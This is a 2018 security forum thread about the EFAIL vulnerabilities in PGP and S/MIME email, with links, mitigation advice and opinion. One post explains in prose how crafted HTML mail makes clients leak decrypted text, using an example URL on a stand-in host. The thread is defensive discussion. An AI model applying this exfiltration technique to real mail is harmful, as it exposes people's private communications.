EFF -- Attention PGP Users: New Vulnerabilities Require You to Take Action Now

Discussion in 'privacy technology' started by mirimir, May 14, 2018.

  1. mirimir

    mirimir Registered Member

    Joined:
    Oct 1, 2011
    Posts:
    8,106
    https://www.eff.org/deeplinks/2018/...w-vulnerabilities-require-you-take-action-now
    https://twitter.com/seecurity/status/995906576170053633
     
  2. reasonablePrivacy

    reasonablePrivacy Registered Member

    Joined:
    Oct 7, 2017
    Posts:
    630
    Location:
    Member state of European Union
    Whoa. What?

    I hope that at least files encrypted using GnuPG with only symmetric algorithm are safe. I recommended that for backup purposes and even there is one article written by me somewhere in the Internet.
     
  3. reasonablePrivacy

    reasonablePrivacy Registered Member

    Joined:
    Oct 7, 2017
    Posts:
    630
    Location:
    Member state of European Union
  4. mood

    mood Updates Team

    Joined:
    Oct 27, 2012
    Posts:
    7,701
    EFAIL describes vulnerabilities in the end-to-end encryption technologies OpenPGP and S/MIME that leak the plaintext of encrypted emails.
    https://efail.de

    Full technical paper:
    Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels [v0.9 Draft]
    https://efail.de/efail-attack-paper.pdf
     
  5. RockLobster

    RockLobster Registered Member

    Joined:
    Nov 8, 2007
    Posts:
    1,803
    It's got to the point where we may as well just have a generic notice.

    A vulnerability has been discovered in,
    ..enter the name of your favorite software..
    This vulnerability reveals all of your private data to an attacker.
     
  6. mood

    mood Updates Team

    Joined:
    Oct 27, 2012
    Posts:
    7,701
    People Are Freaking Out That PGP Is ‘Broken’—But You Shouldn’t Be Using It Anyway
    May 14, 2018
    https://motherboard.vice.com/en_us/article/3k4nd9/pgp-gpg-efail-vulnerability
     
  7. reasonablePrivacy

    reasonablePrivacy Registered Member

    Joined:
    Oct 7, 2017
    Posts:
    630
    Location:
    Member state of European Union
    GnuPG developers (main open-source OpenPGP implementation) think this is not a hole in the current standard, because standard defines Modification detection codes. GnuPG implements MDCs, so this implementation is sound. Unfortunately a lot of email clients and GUIs for GnuPG are vulnerable.
     
  8. mirimir

    mirimir Registered Member

    Joined:
    Oct 1, 2011
    Posts:
    8,106
  9. BoerenkoolMetWorst

    BoerenkoolMetWorst Registered Member

    Joined:
    Dec 22, 2009
    Posts:
    4,102
    Location:
    Outer space
  10. mirimir

    mirimir Registered Member

    Joined:
    Oct 1, 2011
    Posts:
    8,106
    OK, so Thunderbird plus Enigmail is probably most popular in Linux. And according to Robert J. Hansen:[0]
    So if you use Enigmail, do make sure that you're not at v1.99. Just get the add-on in Thunderbird.

    Also, of course, make sure that external resources aren't being fetched.

    0) https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060321.html

    Edit: Oh, but damn. There's more in that thread. Enigmail >v2 can be forced to decrypt with MDC missing.[1] And this is a gpg bug:[2]
    However:[3]
    I also saw something about it requiring HTML decoding, but can't find it again :(

    1) https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060325.html

    2) https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060329.html

    3) https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060328.html

    More: Yes, disable HTML rendering. In Thunderbird, select "/ View / Message Body As / Plain Text".

    And:[4]
    So basically, 1) the attacker embeds a link to the encrypted message, 2) the email client fetches and decrypts it, and then 3) sends plaintext back to the attacker.

    4) https://lists.cpunks.org/pipermail/cypherpunks/2018-May/042194.html
     
    Last edited: May 14, 2018
  11. mood

    mood Updates Team

    Joined:
    Oct 27, 2012
    Posts:
    7,701
    No, PGP is not broken, not even with the Efail vulnerabilities
    Recently, news broke about potential vulnerabilities in PGP, dubbed Efail. However, despite reports to the contrary, PGP is not actually broken, as we will explain in this post.
    May 15, 2018

    https://protonmail.com/blog/pgp-vulnerability-efail/
     
  12. mirimir

    mirimir Registered Member

    Joined:
    Oct 1, 2011
    Posts:
    8,106
    OK, here's how it works. An attacker has some cyphertext that you created with OpenPGP. So they send you an HTML email, including the cyphertext. Your client decrypts the cyphertext, as usual. But the email is structured so that the resulting plaintext gets incorporated into the URL for an embedded image. So by fetching that "image", your client sends the plaintext to the attacker. An attacker could also generate link URLs that way.

    Clever. The fundamental issue is that OpenPGP doesn't properly vet content piped to email clients. There's also the issue that some email clients don't properly handle warnings from OpenPGP.

    But anyway, there are obvious security practices that block this exploit, even though OpenPGP is vulnerable. Don't render HTML. Only text. Don't fetch remote resources, such as embedded images. And inspect URLs before browsing them. URLs should comprise only host names, and simple folder and file names. No long random-looking strings.

    And seriously, those have been my standard practice for well over a decade.
     
    Last edited: May 16, 2018
  13. Palancar

    Palancar Registered Member

    Joined:
    Oct 26, 2011
    Posts:
    2,057
    Agreed. I am that + crazy more. I still manually move my encrypted email/data to a separate place and then perform the decryption individually. Then I construct a remote response if desired and manually transfer that to a place to send my response. Its slow of course but I always trade convenience away for security. Its not a complete air gap but its close in a way. In the past few years I am only doing 10 or less encrypted emails a day. My system would be too labor intense if I were sending 50 emails like many years ago.
     
  14. RockLobster

    RockLobster Registered Member

    Joined:
    Nov 8, 2007
    Posts:
    1,803
    So is this using the same exploit as email tracking pixels use? A link embedded in an email to a tiny invisible remote image?
     
  15. mirimir

    mirimir Registered Member

    Joined:
    Oct 1, 2011
    Posts:
    8,106
    In a sense, yes.

    It leverages how email clients typically decrypt stuff automatically. Say, to yield "this is my plaintext". And how they concatenate pieces of multipart emails. So the email client generates an embedded image URL like "https://foo.xyz/this is my plaintext". And "this is my plaintext" shows up in the server's web log, along with your IP address etc. Whether or not an image actually gets fetched doesn't matter.
     
  16. chrisretusn

    chrisretusn Registered Member

    Joined:
    Jun 16, 2004
    Posts:
    1,377
    Location:
    Philippines
    Okay I'm no expert, but after reading up on this... I say it's yet another scare alert that really isn't. It's more about email clients not interfacing correctly with PGP not about OpenPGP. I'm not worried at all over this. I used Claws-Mail which according to the paper is not affected. That and I only exchange encrypted messages with a very small number of people, we use plaint text only.
     
  17. deBoetie

    deBoetie Registered Member

    Joined:
    Aug 7, 2013
    Posts:
    1,655
    Location:
    UK
    Repeat x1000. HTML is irrevocably designed to leak information to the mainframe you're connected to, and clearly allows unconstrained connections to be made to all and sundry. It presumes display and makes it hard to process headless.

    In other words, a security and privacy disaster.

    In my opinion, email and web browsing should be ditched and secure messaging be used instead, with a schema (NOT HTML!!!!) which cleanly decouples parsing, processing, encryption/decryption and rendering of the content. So that, in an extreme case, the stages could happen in different address spaces (either sandboxes, virtual machines or physical machines). By agreeing a simple xml schema for instance, open source client code could parse content and make it available to the other stages of the process.
     
  18. kdcdq

    kdcdq Registered Member

    Joined:
    Apr 19, 2002
    Posts:
    815
    Location:
    A Non-Sh*thole State
    I just KNEW something was wrong with PGP over a year ago but just couldn't prove it. I expressed my concern to some, uhh, government agencies where I have contacts; silence followed.
     
  19. mirimir

    mirimir Registered Member

    Joined:
    Oct 1, 2011
    Posts:
    8,106
    Sure. But an adversary could have old encrypted messages. From one of your contacts, from a mail server, or whatever.

    And they could send you one of these crafted messages, containing that cyphertext.

    But if Claws-Mail truly isn't vulnerable, no problem.
     
  20. mirimir

    mirimir Registered Member

    Joined:
    Oct 1, 2011
    Posts:
    8,106
    This isn't primarily an OpenPGP issue. It's mainly about how email apps handle encrypted content.
     
  21. kdcdq

    kdcdq Registered Member

    Joined:
    Apr 19, 2002
    Posts:
    815
    Location:
    A Non-Sh*thole State
    Well stated!
     
  22. RockLobster

    RockLobster Registered Member

    Joined:
    Nov 8, 2007
    Posts:
    1,803
    I'm at the point where I almost don't care anymore because I know there is no point.
    Once you understand that it is the agenda that private individuals should not have private communications then you have to know it is the job of multi billion dollar agencies to enforce that agenda. That is what they are paid to do.
    The kind of budgets available means they have almost unlimited resources to assign thousands of coders to infiltrate, fork or take over open source projects for the purpose of breaking security, buy companies that create encryption products for the same reason and infiltrate others including organisations that develop and approve standards and protocols.
    So regardless of this latest known email vulnerability, if the OS and other software is not recording keystrokes, taking screenshots, capturing passwords and encryption keys, implementing weakened encryption etc we might say those agencies are not worth a damn because they couldnt do the job they have been assigned to do.
    But I think most would agree that is not accurate, they damn sure can do their job.
     
    Last edited: May 20, 2018
  23. mirimir

    mirimir Registered Member

    Joined:
    Oct 1, 2011
    Posts:
    8,106
    https://medium.com/@cipherpunk/efail-a-postmortem-4bef2cea4c08
     
  24. chrisretusn

    chrisretusn Registered Member

    Joined:
    Jun 16, 2004
    Posts:
    1,377
    Location:
    Philippines
  25. mood

    mood Updates Team

    Joined:
    Oct 27, 2012
    Posts:
    7,701
    Statement from PGP developers about eFail
    Recent news reports regarding “eFail” have contained significant errors regarding the security of PGP email encryption. It is necessary to correct the record.
    May 24, 2018

    https://protonmail.com/blog/pgp-efail-statement/
     
Loading...
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.